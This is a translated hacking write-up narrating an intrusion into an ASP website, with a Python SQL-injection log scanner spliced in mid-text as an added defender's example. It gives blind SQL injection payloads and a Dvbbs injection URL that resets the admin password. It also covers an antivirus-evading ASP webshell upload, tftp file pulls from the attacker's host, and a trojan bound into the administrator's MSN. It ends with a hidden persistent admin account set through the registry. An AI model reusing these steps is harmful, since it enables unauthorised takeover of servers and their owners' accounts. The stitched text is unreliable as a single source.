Helping a friend test the whole process of Website Security penetration intrusion

Source: Internet
Author: User

A friend gave me a website and asked me to test its security. I opened the URL and had a rough look; I estimated it was a Windows 2000 system (why? the pages are ASP). Then I scanned it with X-SCAN: not a single vulnerability (including WEBDAVX and DRPC), so it had probably been patched to SP4 plus the DRPC patch. The only good news was that many ports [139, 445, 135, 80] were open. It seemed there was no port filtering and no firewall installed, or else it was a honeypot ^_^.

On the homepage there was a news publishing system. Appending 1=1 and then 1=2 to the URL and comparing the returned pages showed a SQL INJECTION vulnerability. First, check for the table as follows:
0<>(select%20count(*)%20from%20admin)
0<>(select%20count(*)%20from%20admin%20where%20username%20<>)
0<>(select%20count(*)%20from%20admin%20where%20passwd%20<>)
Haha, it is the common table layout. From the front end I could see that the administrator's username is root.
Submit as follows:
Root=(select%20username%20from%20admin%20where%20len(passwd)=8)
An error is displayed; submit again:
Root=(select%20username%20from%20admin%20where%20len(passwd)=16)
Displayed successfully.
Depressing: the password is stored encrypted as a 16-character value, so guessing it one character at a time is pointless. I gave up on guessing it.

[Tip: you can try OR when performing cross-table subqueries. Even if your first condition is false, the effect of the OR still shows. For example:
0 or 1=1 returns the original page
0 or 0=0 prompts that the database cannot find the information]
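The boolean probes above (1=1 / 1=2 tautologies, select count(*) from <table> subqueries, len(column)=N length guesses) leave a recognisable trail in the web server log. As an added defender's example that is not part of the original write-up, the following Python scans constructed IIS W3C-style log lines for those three probe shapes and flags client IPs that issue several of them in sequence; the log lines, IP addresses and file names are all constructed for the demo.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines for the demo (not real traffic).
# Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2004-05-01 10:00:01 192.0.2.10 GET /news.asp id=12 200
2004-05-01 10:00:05 192.0.2.10 GET /news.asp id=12%20and%201=1 200
2004-05-01 10:00:06 192.0.2.10 GET /news.asp id=12%20and%201=2 500
2004-05-01 10:00:20 192.0.2.10 GET /news.asp id=12%20and%200<>(select%20count(*)%20from%20admin) 200
2004-05-01 10:00:40 192.0.2.10 GET /news.asp id=12%20and%20'root'=(select%20username%20from%20admin%20where%20len(passwd)=16) 200
2004-05-01 10:01:00 198.51.100.7 GET /news.asp id=7 200
"""

# One rule per probe shape from the write-up, matched against the
# URL-decoded query string, case-insensitively.
RULES = {
    "tautology": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "count_subquery": re.compile(r"select\s+count\(\*\)\s+from\s+\w+", re.I),
    "length_probe": re.compile(r"\blen\s*\(\s*\w+\s*\)\s*=\s*\d+", re.I),
}
LINE_RE = re.compile(r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
                     r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$")

def classify_query(query: str) -> list:
    """Names of every rule the decoded query string triggers."""
    decoded = unquote_plus(query)
    return [name for name, rx in RULES.items() if rx.search(decoded)]

def scan_iis_log(text: str) -> list:
    """One hit dict per log line that triggers at least one rule."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip #Fields headers, comments and malformed records
        rules = classify_query(m["query"])
        if rules:
            hits.append({"ip": m["ip"], "stem": m["stem"],
                         "query": unquote_plus(m["query"]), "rules": rules})
    return hits

def probing_sources(hits: list, threshold: int = 3) -> dict:
    """Client IPs whose hit count reaches the threshold: a probing sequence, not a one-off."""
    counts = Counter(h["ip"] for h in hits)
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

Real IIS logs may encode `<`, `>` and quotes as %3C, %3E and %27; the decoding step handles those the same way as the %20 spacing shown here.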

Let's look at what else is useful on this website: it has a Dvbbs ("mobile network") forum. I had read PSKEY's article "The smile behind the scenes: on the DVBBS vulnerability": construct a membername in the cookie and request logout.asp to guess the password. Then I ran the exploit to get the username, ID and MD5 value of the front-end administrator's admin login. I used a cookie modifier to change the cookie and closed the current window; when I opened a new page to access the forum, I was already an administrator. Submit:
admin_recycle.asp?Action=restore&topicid=%20where%20id%20in%20(9&tablename=admin%20set%20[password]=ef7813118e77b0ee,lastloginip=bbs
This changes the password of the back-end administrator. Now you can go into the back end ~~~. After logging in, change the upload settings and upload an ASP trojan, aspcmd.asp.

[I encrypted aspcmd.asp with screnc so it is not detected. By the way, the Haiyang Top ASP trojan xp.net: neither Norton nor Rising can find the virus, but KV2004 can. I estimate the signature KV2004 matches is a string of Chinese characters; can anyone tell me which one?]

Ran the command, OK, got a web shell. I originally wanted to use an NC reverse connection, but after uploading it, DIR did not show it; I estimate it was killed by the anti-virus software. So I used TFTP:
tftp -i IP GET
to pull IDQ.DLL and copied it to the SCRIPTS directory (this is an administrator error: the directory permissions were not set).
I thought the game was over, but NET USER MM /ADD gave: Access denied. With insufficient permissions you can replace a self-starting program or service on the server. I checked the system services and found none that could be used [permission issue], then uploaded REG and queried:
Reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Access denied.

It seemed there was no way. I looked on the Internet for something to escalate privileges on 2K [SP4] and was about to give up. Out of boredom I used DIR to look at some directories on the hard disk and suddenly found an interesting directory: D:\Program Files\MSN on the terminal. I downloaded MSNCOPY to the web directory, bound it with a modified Glacier (Binghe) trojan before uploading, and waited for the administrator to use MSN.
A few days later I connected with my Glacier client: OK, GAME OVER.

First CA, then use a VBS to leave a backdoor account that does not die: put net user guest *** /add and net localgroup administrators /add ~~~ in the registry under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor, importing the VBS directory.
Summary of this intrusion:
1: The directory permission settings are poor.
2: FSO is not renamed or deleted.
3: No port filtering or firewall is in place.
4: Best not to run non-essential software such as MSN/QQ on the server.
5: Keep system patches current, and other application software on the server must also be the latest.
